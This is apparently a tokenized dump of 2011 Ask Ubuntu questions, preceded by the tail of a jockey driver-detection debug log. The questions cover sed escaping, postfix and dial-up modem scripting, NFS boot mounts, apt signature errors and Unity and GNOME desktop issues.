jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'input : b0019v0000p0006e0000-e0,1 , ke0 , e1 , e3 , f1 , f2 , f3 , f4 , f5 , ramlsfw ' ) 2011-11-08 10:10:56,717 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'ssb : v4243id0806rev07 ' ) 2011-11-08 10:10:56,717 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v00008086d0000284bsv00001028sd00000228bc04sc03i00 ' ) 2011-11-08 10:10:56,717 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'dmi : bvndellinc. : bvra05 : bd02/03/2008 : svndellinc. : pnvostro1500 : pvr : rvndellinc. : rn0wy040 : rvr : cvndellinc . : ct8 : cvr : ' ) 2011-11-08 10:10:56,717 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'acpi : pnp0000 : ' ) 2011-11-08 10:10:56,717 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'ssb : v4243id0817rev03 ' ) 2011-11-08 10:10:56,717 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'input : b0019v0000p0001e0000-e0,1 , k74 , ramlsfw ' ) 2011-11-08 10:10:56,717 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'usb : v1d6bp0002d0300dc09dsc00dp00ic09isc00ip00 ' ) 2011-11-08 10:10:56,717 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'usb : v093ap2510d0100dc00dsc00dp00ic03isc01ip02 ' ) 2011-11-08 10:10:56,717 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v00008086d0000283esv00001028sd00000228bc0csc05i00 ' ) 2011-11-08 10:10:56,718 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'acpi : pnp0103 : pnp0c01 : ' ) 2011-11-08 10:10:56,718 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'input : b0003v05a9p2640e0100-e0,1 , kd4 , ramlsfw ' ) 2011-11-08 10:10:56,718 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'acpi : pnp0200 : ' ) 2011-11-08 10:10:56,718 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v00008086d00002448sv00001028sd00000228bc06sc04i01 ' ) 2011-11-08 10:10:56,718 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'usb : v05a9p2640d0100dcefdsc02dp01ic0eisc01ip00 ' ) 2011-11-08 10:10:56,718 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'wmi : a3776ce0-1e88-11db-a98b-0800200c9a66 ' ) 2011-11-08 10:10:56,718 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v00008086d00002828sv00001028sd00000228bc01sc01i8f ' ) 2011-11-08 10:10:56,718 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v00008086d00002836sv00001028sd00000228bc0csc03i20 ' ) 2011-11-08 10:10:56,718 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v00008086d00002830sv00001028sd00000228bc0csc03i00 ' ) 2011-11-08 10:10:56,719 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'platform : fixed mdio bus ' ) 2011-11-08 10:10:56,719 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'input : b0011v0002p0007e01b1-e0,1,3 , k110,111,145,14a,14d,14e , ra0,1,18,1c , mlsfw ' ) 2011-11-08 10:10:56,719 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'wmi:8d9ddcbc-a997-11da-b012-b622a1ef5492 ' ) 2011-11-08 10:10:56,719 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'usb : v1058p0740d1003dc00dsc00dp00ic08isc06ip50 ' ) 2011-11-08 10:10:56,719 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'wmi : a80593ce-a997-11da-b012-b622a1ef5492 ' ) 2011-11-08 10:10:56,719 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'platform : eisa ' ) 2011-11-08 10:10:56,719 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v00008086d00002815sv00001028sd00000228bc06sc01i00 ' ) 2011-11-08 10:10:56,719 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'serio : ty01pr00id00ex00 ' ) 2011-11-08 10:10:56,719 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'ssb : v4243id0812rev0a ' ) 2011-11-08 10:10:56,719 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v00008086d00002832sv00001028sd00000228bc0csc03i00 ' ) 2011-11-08 10:10:56,720 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'input : b0019v0000p0000e0000-e0,1,4 , k94,95 , a1 , e0 , e1 , e3 , ec , ee , f0 , ram4 , lsfw ' ) 2011-11-08 10:10:56,720 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'input : b0003v093ap2510e0110-e0,1,2,4 , k110,111,112 , r0,1,8 , am4 , lsfw ' ) 2011-11-08 10:10:56,720 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'acpi : pnp0b00 : ' ) 2011-11-08 10:10:56,794 debug : nvidia ( nvidia_173 ) .enabled ( ) : target_alt /usr/lib/nvidia-173/ld.so.conf current_alt /usr/lib/nvidia-173/ld.so.conf other target alt /usr/lib/nvidia-173/alt_ld.so.conf other current alt /usr/lib/nvidia-173/alt_ld.so.conf 2011-11-08 10:10:56,889 debug : kmh enabled : true 2011-11-08 10:10:58,397 debug : broadcomwlhandler enabled ( ) : kmod enabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2011-11-08 10:10:58,576 debug : broadcomwlhandler enabled ( ) : kmod enabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2011-11-08 10:10:58,633 debug : nvidia ( nvidia_current ) .enabled ( ) : target_alt none current_alt /usr/lib/nvidia-173/ld.so.conf other target alt none other current alt /usr/lib/nvidia-173/alt_ld.so.conf 2011-11-08 10:10:58,634 debug : nvidia_current is not the alternative in use 2011-11-08 10:10:59,826 debug : nvidia ( nvidia_173_updates ) .enabled ( ) : target_alt none current_alt /usr/lib/nvidia-173/ld.so.conf other target alt none other current alt /usr/lib/nvidia-173/alt_ld.so.conf 2011-11-08 10:10:59,826 debug : nvidia_173_updates is not the alternative in use 2011-11-08 10:11:01,010 debug : nvidia ( nvidia_current_updates ) .enabled ( ) : target_alt none current_alt /usr/lib/nvidia-173/ld.so.conf other target alt none other current alt /usr/lib/nvidia-173/alt_ld.so.conf 2011-11-08 10:11:01,011 debug : nvidia_current_updates is not the alternative in use 2011-11-08 10:11:02,200 debug : nvidia ( nvidia_173 ) .enabled ( ) : target_alt /usr/lib/nvidia-173/ld.so.conf current_alt /usr/lib/nvidia-173/ld.so.conf other target alt /usr/lib/nvidia-173/alt_ld.so.conf other current alt /usr/lib/nvidia-173/alt_ld.so.conf 2011-11-08 10:11:02,295 debug : kmh enabled : true 2011-11-08 10:11:02,575 debug : nvidia ( nvidia_173 ) .enabled ( ) : target_alt /usr/lib/nvidia-173/ld.so.conf current_alt /usr/lib/nvidia-173/ld.so.conf other target alt /usr/lib/nvidia-173/alt_ld.so.conf other current alt /usr/lib/nvidia-173/alt_ld.so.conf 2011-11-08 10:11:02,684 debug : kmh enabled : true 2011-11-08 10:11:07,520 debug : broadcomwlhandler enabled ( ) : kmod enabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2011-11-08 10:11:07,702 debug : broadcomwlhandler enabled ( ) : kmod enabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2011-11-08 10:11:21,321 debug : broadcomwlhandler enabled ( ) : kmod enabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2011-11-08 10:11:21,509 debug : broadcomwlhandler enabled ( ) : kmod enabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted
76739	is there a text editor for the command line that uses the same keys as notepad on windows ?	i 'm used to work in windows environment and are used to the commands in notepad e.g . ctrls for save , ctrlc for copy and so on . on ubuntu it 's handy to work directly in the command line , e.g . as with vi mytextfile.txt . i would like to use a text editor that i can use in the terminal but with the same key commands as notepad on windows . is there any text editor with `` notepad commands '' for ubuntu command line ?
76741	errors running apt-get update after upgrading to 11.10	i recently updated my chromebook that was running ubuntu 11.04 to 11.10 and since updating , whenever i run apt-get update i get the following errors : w : gpg error : http : //security.ubuntu.com oneiric-security release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //extras.ubuntu.com oneiric release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //us.archive.ubuntu.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > the repositories look like they 're the primary repositories for 11.10 , so i am assuming that this is a pretty bad error . the rest of the update happens without any problems , it is just these three repos that error . is there something that i can do about the bad signatures ?
76742	restarting the ipv6 network stack without restarting the ipv4 network stack ?	in ubuntu i use ssh to log in to my webserver . the ipv4 side of things is configured and already works , i can log in from other machines . but i 'd like to configure the ipv6 side of things while i 'm logged in using ipv4 ( if that 's possible with a single nic ) . is it possible to specify that you only want to restart the ipv6 stack / interface and not the ipv4 one ?
76766	how do i overcome these package dependency problems ?	i upgraded to 11.10 and lost power during the upgrade . after bringing the box back up , i attempted to continue the upgrade and at one point did a partial upgrade to resolved dependency issues that i thought at the time were related to may failed upgrade . now i have a working system for the most part . the problem is i can not install the 'acroread ' package anymore because of dependency errors : ~ $ sudo apt-get install acroread reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : acroread : depends : nspluginwrapper but it is not going to be installed e : unable to correct problems , you have held broken packages . ~ $ sudo apt-get install nspluginwrapper reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nspluginwrapper : depends : nspluginviewer ( = 1.4.4-0ubuntu3 ) e : unable to correct problems , you have held broken packages . ~ $ sudo apt-get install nspluginviewer r eading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nspluginviewer : i386 : depends : libgtk2.0-0 : i386 ( > = 2.8.0 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i am running 64-bit but it seems acroread needs some 32-bit libraries that are not able to be installed . in my reading , i 've found that there were some changes to multi-arch packages . does anyone know how i can repair my system to get around this problem ?
76778	thunderbird check mail shortcut missing in dash	the thunderbird check mail shortcut is missing it 's icon in the dash of ubuntu 11.10 when i go to preferred applications i have two choices for the mail app thunderbird mail & thunderbird mail/news if i select thunderbird mail as default app then there is no icon in the dash but if i select thunderbird mail/news then the icon shows up but thunderbird wo n't launch .
76785	how to escape file path in sed ?	i would like to replace $ filewithpath in $ file , however this not works because ( i think ) path is not escaped . how to escape it ? sed -i 's/ $ { filewithpath } /haha/g ' $ file
76788	delay in sending mail postfix queue	i have a mail server that periodically connects to the internet via modem dialup and before was able to send emails with attachments of 300kb and 500kb in just only 1 or 2 minutes , i have not made ââany change in postifx and now i take longer than normal to out postifix queue , sometimes it took more than 10 min to deliver an email of just 300kb , if this is in queue with others mails containing only text accompanying the rest out normally while the of 300kb containing an attachment is delayed more than usual . previously this was not happening and all the emails was sending very quickly . any suggestion of what is going on here ? this can be caused by a very long postfix maillog file that needs to be rotated , or reconfig the mastercf ?
76803	how do i modify the message notifier widget in the unity global menu ?	i started to ask `` what 's this not-a-panel panel in unity , and how do i control it ? '' but i 've at least gotten as far as realizing it is the `` global menu '' . my global menu has a message notifier widget in place that scans my email , empathy , pidgin , etc . for new messages . i 'd like to ... remove evolution from the menu ( it shows me both evolution and thunderbird even though i do n't have any email addresses set up on evolution ) . tell it to use pidgin or empathy -- for some reason it is currently showing me both . i 'm frustrated that right-click does n't give me any additional options here . i ca n't even figure out how to quit pidgin , since it is only in my message indicator , not in my launcher .
76808	how to use variables in sed ?	i try the fallowing code and it does nothing var1=qq sed -i 's/ $ var1/zz/g ' $ file however this code replaces qq with zz sed -i 's/qq/zz/g ' $ file how to use variables in sed ?
76815	how to turn off `airplane mode` ?	i have a problem get the wifi to work in ubuntu 11.10 . when i use gnome network manager it indicates that wireless is disabled by hardware switch while it is not . in the network settings panel in the wireless section , it only shows the hardware address and the switch is off and it 's disabled so that i ca n't change the status to on . at the bottom there is an airplane mode switch which is on , and turning it off has no effect and it immediately turns back on . i use a dell vostro 1520 laptop .
76831	amd a8-3850 and asus f1a75-m works well on ubuntu ?	i 'm thinking about mount a new computer with a amd a8-3850 processor and an asus f1a75-m motherboard . i would like to know if both of them work well with ubuntu 11.10 , specially because the motherboard has uefi technology and the processor has a integrated graphics unity ( apu ) . the 3d acceleration works well with catalyst drivers ? i 'll only use ubuntu 11.10 ( and ubuntu 12.04 when it 's released ) no windows at all , so it 's crucial know if the motherboard and the processor ( with video acceleration ) works fine on ubuntu . anyone has experience with these two components ? any info will be appreciated . thanks in advance .
76834	gstreamer screenshot video stream	when i use this command : gst-launch ximagesrc ! video/x-raw-rgb , framerate=5/1 ! ffmpegcolorspace ! theoraenc ! oggmux ! filesink location=desktop.ogg ximagesrc usage it shows me only desktop screenshot and video length is 0:00 or sometimes it just shows pictures without mouse motion . more information : ubuntu 10.04.3 this is a text
76837	how to disconnect modem when postfix queue gets empty ?	in /etc/ppp/ip-up.d/script i have the following that runs fetchmail when the ppp0 interface is up ( connected ) and when it finish the modem ends internet conection automatically . # ! /bin/sh /usr/bin/fetchmail -v -f /etc/fetchmailrc -l /var/log/fetchmail.log killall wvdial this works perfectly . now i need to add to the script below the fetchmail command execution something that checks if the mail queue of postfix is completely empty and if is true then execute the command killall wvdial to hangup the modem . in theory i know i could do something using if , else , do , while , until etc . but in practice i do not know how to develop it . i would like you guys to help me to program and complete this script to work properly . i appreciate the comments .
76841	splash screen `` scrambles ''	trying to install 11.10 to a shuttle glamor xpc from a usb . the usb works on other computers , so i know this is just a problem with the shuttle . ubuntu splash screen displays , and shows the `` loading '' dots ... then , the screen `` scrambles '' ; `` ubuntu '' displays 4-5 times across the bottom of the screen , with entire horizontal lines missing . i assume this is some sort of video driver issue specific to this computer ? i 'm running a shuttle fg31 motherboard , with intel g33/g31 express chipset graphics . the documentation from the ubuntu site says the integrated graphics card is compatible with 11.10 , so i 'm at a loss . windowsxp works fine on this system , without a hint of video card problems . i 've tried booting with nomodeset , but no luck . what 's the next step to troubleshoot this ?
76848	software center wo n't start : `` attributeerror : 'gi.repository.gtk ' object has no attribute 'fontselectiondialog ' ``	when i try to run software-center from the terminal it gives me : traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 33 , in < module > from gi.repository import gtk file `` /usr/lib/python2.7/dist-packages/gi/importer.py '' , line 76 , in load_module dynamic_module._load ( ) file `` /usr/lib/python2.7/dist-packages/gi/module.py '' , line 224 , in _load overrides_modules = __import__ ( 'gi.overrides ' , fromlist= [ self._namespace ] ) file `` /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py '' , line 523 , in < module > class fontselectiondialog ( gtk.fontselectiondialog , dialog ) : file `` /usr/lib/python2.7/dist-packages/gi/module.py '' , line 105 , in __getattr__ self.__name__ , name ) ) attributeerror : 'gi.repository.gtk ' object has no attribute 'fontselectiondialog' a similar response is given when upgrade-manager or the advanced-settings ( for gnome shell settings ) is attempted . these are all the malfunctioning applications i know of right now , but there may be more . i 'm running ubuntu 11.10 and the gnome-shell environment . the error occurred after an automatic upgrade ( i think ) . i have found people with the same or similar problem but none of the fixes has worked for me . i have tried reinstalling python2.7 and some of the other packages via synaptic . i can still upgrade my distribution since i can run ubuntu tweak , but i 'd like to sort this out . i have been using some of the experimental repositories for gnome shell development but since i figured this might be the reason for the error i purged ( successfully i hope ) and disabled them via ubuntu tweak . help on a basic knowledge level would be much appreciated .
76854	osuse and ubuntu : error15 on grub	installed ubuntu 11.10 from opensuse 11 , by this method : https : //help.ubuntu.com/community/installation/netbootinstallfrominternet now grub gives error 15 ( i think it 's ubuntu 's grub )
76857	how do i convert any ubuntu istallation to a command-line system ?	on the alternate cd there is the option to install a command-line system . what packages ( or meta-packages ) are installed when i select this option ? what is the easiest way to remove all packages except those and their dependencies ( possibly using synaptic or the software centre ) ?
76860	cd/dvd drive not mounted when inserted with disc of any kind	i just noticed that if a insert a cd or a dvd of any kind , the drive will start spinning but it will not show the mounted disc . earlier it used to ask me what to do with the media inserted . now it does n't even do that . i ran the following commands in terminal : $ eject -n eject : device is `/dev/sr0' $ sudo mount -o ro , unhide , uid=1000 /dev/cdrom /mnt/cdrom mount : mount point /mnt/cdrom does not exist what can i do to get the functionality back on my drive ? i am running ubuntu 11.10 . updates thanks waltinator : i ran the 'dmesg ' but do n't know what i 'm looking for . im a newbie on this . the same thing with the 'ls -rlt /var/log ' command . should i create the directory for the mount ? at this point really do n't know what to do . – cisco sán 7 hours ago after i successfully inserted a cd , following are the first 3 lines of dmesg command : $ dmesg [ 4804.416018 ] wlan0 : no ipv6 routers present [ 8214.125450 ] isdit iso 9660 extensions : microsoft joliet level 3 [ 8214.136556 ] iso 9660 extensions : rrip_1991a reply by waltinator : the first line is a previous event , my wireless going online . the next 2 lines are a good result . the number in square brackets is `` seconds since boot '' , the rest of the line is usually helpful . and no , you should not create the mount point . let 's try to get the automatic mounting to work . – waltinator these are my last 3 lines of dmesg : [ 18.130819 ] init : plymouth-stop pre-start process ( 1396 ) terminated with status 1 [ 28.780011 ] wlan0 : no ipv6 routers present [ 505.632119 ] ce : hpet increased min_delta_ns to 20113 nsec reply by waltinator : it looks like your cd/dvd drive is not connected to the data bus , and not causing an interrupt when you insert a platter . try dmesg | grep -a8 cd-rom which should show you what the system thought was available when it came up . – waltinator this is my terminal output : $ dmesg | grep -a8 cd-rom [ 0.774351 ] scsi 0:0:0:0 : cd-rom hl-dt-st dvd+-rw gsa-t40n a100 pq : 0 ansi : 5 [ 0.778117 ] sr0 : scsi3-mmc drive : 24x/24x writer dvd-ram cd/rw xa/form2 cdda tray [ 0.778122 ] cdrom : uniform cd-rom driver revision : 3.20 [ 0.778282 ] sr 0:0:0:0 : attached scsi cd-rom sr0 [ 0.778340 ] sr 0:0:0:0 : attached scsi generic sg0 type 5 [ 0.780416 ] freeing unused kernel memory : 984k freed [ 0.780732 ] write protecting the kernel read-only data : 10240k [ 0.780986 ] freeing unused kernel memory : 20k freed [ 0.786331 ] freeing unused kernel memory : 1400k freed [ 0.804912 ] udevd [ 90 ] : starting version 173 [ 0.874178 ] r8169 gigabit ethernet driver 2.3lk-napi loaded [ 0.874208 ] r8169 0000:02:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 reply by waltinator : ok , your system sees the drive . can you open and close the tray with eject and eject -t ? run udevadm monitor while you insert a cd ( type ^c when done ) and see if you get `` change '' and `` add '' messages . – waltinator eject works perfectly ; eject -t does nothing . $ udevadm monitor kernel [ 13771.009267 ] change /devices/pci0000:00/0000:00:1f.1/host0/target0:0:0/0:0:0:0/block/sr0 ( block ) udev [ 13773.878887 ] change /devices/pci0000:00/0000:00:1f.1/host0/target0:0:0/0:0:0 /block/sr0 ( block ) terminal output of sudo hwinfo -- cdrom : $ sudo hwinfo -- cdrom hal.1 : read hal dataprocess 2753 : arguments to dbus_move_error ( ) were incorrect , assertion `` ( dest ) == null || ! dbus_error_is_set ( ( dest ) ) '' failed in file ../../dbus/dbus-errors.c line 280 . this is normally a bug in some application using the d-bus library . libhal.c 3483 : error unsubscribing to signals , error=the name org.freedesktop.hal was not provided by any .service files 22 : scsi 00.0 : 10602 cd-rom ( dvd ) [ created at block.247 ] unique id : kd9e.jgkxts4hgl2 parent id : 3p2j.gdumcd83e+e sysfs id : /class/block/sr0 sysfs busid : 0:0:0:0 sysfs device link : /devices/pci0000:00/0000:00:1f.1/host0/target0:0:0/0:0:0:0 hardware class : cdrom model : `` hl-dt-st dvd+-rw gsa-t40n '' vendor : `` hl-dt-st '' device : `` dvd+-rw gsa-t40n '' revision : `` a100 '' driver : `` ata_piix '' , `` sr '' driver modules : `` ata_piix '' device file : /dev/sr0 ( /dev/sg0 ) device files : /dev/sr0 , /dev/scd0 , /dev/disk/by-id/ata-hl-dt-st_dvd+_-rw_gsa-t40n_k048bj74257 , /dev/disk/by-path/pci-0000:00:1f.1-scsi-0:0:0:0 , /dev/cdrom , /dev/cdrw , /dev/dvd , /dev/dvdrw device number : block 11:0 ( char 21:0 ) features : dvd config status : cfg=new , avail=yes , need=no , active=unknown attached to : # 17 ( ide interface ) drive speed : 31 volume id : `` movie '' publisher : `` intervideo '' creation date : `` 20050424162207000 ''
76861	how to make mht files being seen as thumbnails in nautilus ?	how to make mht files being see as thumbnails in nautilus ? nautilus can see html files thumbnails , that give a hope there is a way to do its with mht .
76867	why is there no lightweight desktop environment specialized for free developers ?	almost every desktop environment that has reached an acceptable amount of quality has structures to appear good for most private users . the user 's home directory has sub-directories like `` my music '' , `` my movies '' , `` my photos '' - but why is there no desktop environment ( in best case very lightweight and effects-free ) that comes with a structure like `` my projects '' , `` my drafts '' , `` my image resources '' , `` my laboratory/unit tests '' ? i use linux as a webserver for running rails-apps and as a development machine for rails , c # mono , somewhat asp mono and of course for browsing the web . where is the desktop environment for people like me ? or better said , for every person that is developing applications in a gui-based ide . have all the hackers and free contributors forgot to unify their requirements for work in a desktop environment of their kind ? imagine a desktop environment , serving all your requirements - and demands on getting it lightweight , installed with all dependencies by hitting apt-get install developers-desktop . or does it already exist and i just have not found it ?
76868	how do i run keepass2 ?	i 'd like to run keepass2 on ubuntu 10.04 - how do i do that ?
76871	will using the gnome 3 ppa in 11.10 break unity ?	i like unity , but want to have newer versions of gnome software . will the ppa break unity in 11.10 like it did in 11.04 ? ppa is : https : //launchpad.net/~gnome3-team/+archive/gnome3
76874	how can i install the non-cd size 12.04 on a computer that ca n't boot from usb & ca n't read dvd-rs ?	i 've been reading that the next version of 12.04 will not fit on a cd . will it be possible to install 12.04 on a computer that ca n't read dvd-rs and ca n't boot from usb ? i do n't want to install a previous version and then `` update '' to 12.04 . is there another option ?
76878	how add panel 3d unity in gnome shell ( not panel 2d unity )	how to add panel 3d unity in gnome shell , not panel 2d unity .
76885	where can i find a g++ 4.7 package ?	some time ago , i managed to find ppa featuring g++-4.7 build . however , i had to reinstall everything on my machine and i lost name of that ppa . could anyone point me to it ? i tried to find it again , but without any luck . i 'm on ubuntu 11.10 installation .
76886	unable to upload directly from network drive to picasaweb	my network drive is bookmarked and clearly visible in nautilus . one little thing that i do not like in ubuntu is that network drives are not always available from applications . last time i have noticed this was when i was trying to upload pictures to picasaweb from my home server . when picasaweb opens up nautilus the network drives are not visible anymore . typing in the link to the drive in the location field does not work either . i think the same problem is valid for the photobook program from pixum .
76889	how to make unity hide applications from the launcher if they 're running on other desktops/workspaces ?	i would like to be able to hide applications running in other workspaces , under unity . for example , chrome is open in workspace 1 , and when i go to another workspace , it should be hidden from the launcher . is this possible ?
76901	nfs mount fails on startup	i have multiple ubuntu servers , recently i 've installed a few 11.04 servers ( and 1 desktop ) and i 've just found that upon rebooting the nfs mounts will not mount . i 've tried upgrading nfs-common to the latest version ( i 'm only one small revision behind ) but that just slightly changes my errors . all of these servers having the issues are clones ( vmware ) from a server template i made awhile back , so i thought maybe it was an issue with the template and therefore all of its clones . i then tried the same mount on the desktop 11.04 but i had the same issues . about half the time i will be able to press `` s '' to skip but the other half of the time the server freezes ( and i restore from a recent snapshot ) . also whats odd is that if i am able to get into the system then i can do a `` mount -a '' just fine and it will mount everything . this makes me think the issue is that nfs is n't waiting for a network to be present in order to try mounting . something else that makes me think this is that i get a `` unable to resolve host '' ( to an nfs point ) error , even though that host is in /etc/hosts . here is my /var/log/boot.log fsck from util-linux-ng 2.17.2 fsck from util-linux-ng 2.17.2 /dev/sda1 was not cleanly unmounted , check forced . /dev/mapper/php53x-root : clean , 75641/1032192 files , 492673/4126720 blocks ( check in 5 mounts ) init : portmap-wait ( statd ) main process ( 373 ) killed by term signal init : statd main process ( 402 ) terminated with status 1 init : statd main process ended , respawning init : statd-mounting main process ( 355 ) killed by term signal mount.nfs : failed to resolve server nfsserver-priv : name or service not known init : statd-mounting main process ( 416 ) killed by term signal mount.nfs : failed to resolve server nfsserver-priv : name or service not known init : statd main process ( 435 ) terminated with status 1 init : statd main process ended , respawning init : statd main process ( 459 ) terminated with status 1 init : statd main process ended , respawning mountall : mount /var/www [ 410 ] terminated with status 32 mountall : mount /var/users [ 436 ] terminated with status 32 init : statd-mounting main process ( 448 ) killed by term signal init : statd main process ( 468 ) terminated with status 1 init : statd main process ended , respawning init : statd main process ( 498 ) terminated with status 1 init : statd main process ended , respawning /dev/sda1 : 226/124496 files ( 1.3 % non-contiguous ) , 39133/248832 blocks mountall : fsck /boot [ 268 ] terminated with status 1 mount.nfs : rpc.statd is not running but is required for remote locking . mount.nfs : either use '-o nolock ' to keep locks local , or start statd . mount.nfs : an incorrect mount option was specified mountall : mount /var/users [ 583 ] terminated with status 32 mount.nfs : rpc.statd is not running but is required for remote locking . mount.nfs : either use '-o nolock ' to keep locks local , or start statd . mount.nfs : an incorrect mount option was specified mountall : mount /var/www [ 575 ] terminated with status 32 mount.nfs : rpc.statd is not running but is required for remote locking . mount.nfs : either use '-o nolock ' to keep locks local , or start statd . mount.nfs : an incorrect mount option was specified mountall : mount /var/www [ 638 ] terminated with status 32 mount.nfs : rpc.statd is not running but is required for remote locking . mount.nfs : either use '-o nolock ' to keep locks local , or start statd . mount.nfs : an incorrect mount option was specified mountall : mount /var/users [ 645 ] terminated with status 32 mount.nfs : rpc.statd is not running but is required for remote locking . mount.nfs : either use '-o nolock ' to keep locks local , or start statd . mount.nfs : an incorrect mount option was specified mountall : mount /var/www [ 724 ] terminated with status 32 mount.nfs : rpc.statd is not running but is required for remote locking . mount.nfs : either use '-o nolock ' to keep locks local , or start statd . mount.nfs : an incorrect mount option was specified mountall : mount /var/users [ 729 ] terminated with status 32 skipping /var/www at user request * starting apparmor profiles [ 80g [ 74g [ ok ] * starting name service cache daemon nscd [ 80g [ 74g [ ok ] fatal : module vmhgfs not found . fatal : module vmsync not found . fatal : module vmblock not found . * loading open-vm-tools modules [ 80g [ 74g [ ok ] * starting open-vm daemon vmtoolsd [ 80g [ 74g [ ok ] sorry for the long post , just wanted to convey as much information as possible . does anyone have any suggestions on this ? i 've been googling all day and i have tried things with _netdev and well as changing the configuration for statd but nothing has worked . i have 6 servers this is effecting . : \ /etc/fstab : ( problem lines only - removing these will allow the rest of nfs to mount ) nfsserver-priv : /vol/vol1_isp/eshowcase/sites /var/www nfs ro , defaults 0 0 nfsserver-priv : /vol/vol1_isp/vusers /var/users nfs defaults 0 0 /etc/hosts ( relevant entry ) : 10.1.1.43 nfsserver-priv
76908	how to uninstall netbeans ?	since i did not install netbeans via the software center ( i installed it as an .sh file ) i ca n't see an easy way of uninstalling the program . how can i safely uninstall the program ?
76913	how can i check if a particular partition ext4 is journaled ?	i need to know this because of this : add the data=writeback mounting option if you formatted the disk without journaling . otherwise add data=ordered which sould be a good compromise between full journaling and none at all . from the ssdchecklist .
76914	ubuntu screenshot program	in windows 7 i had an easy to use `` cut tool for screenshots '' , this one : for ubuntu ive found shutter , but it is n't as easy and comfortable to use like the one i had in windows 7 . are there in ubuntu 11.10 programs like these ?
76916	how to get back the system menu for gnome fallback mode	is there any chance to get back the system menu for gnomes fallback panel ? i really ca n't get warm neither with unity nor with gnome-shell . so i am using the gnome fallback mode . and i am wandering if there is any hope to get the system menu back . in ubuntu 11.10 it is really hard to find some system configurations using unity as well as gnome-shell or fallback mode . the system-preferences window is really poor and i am missing many preferences there . it is also unacceptable that this window is not resizeable .
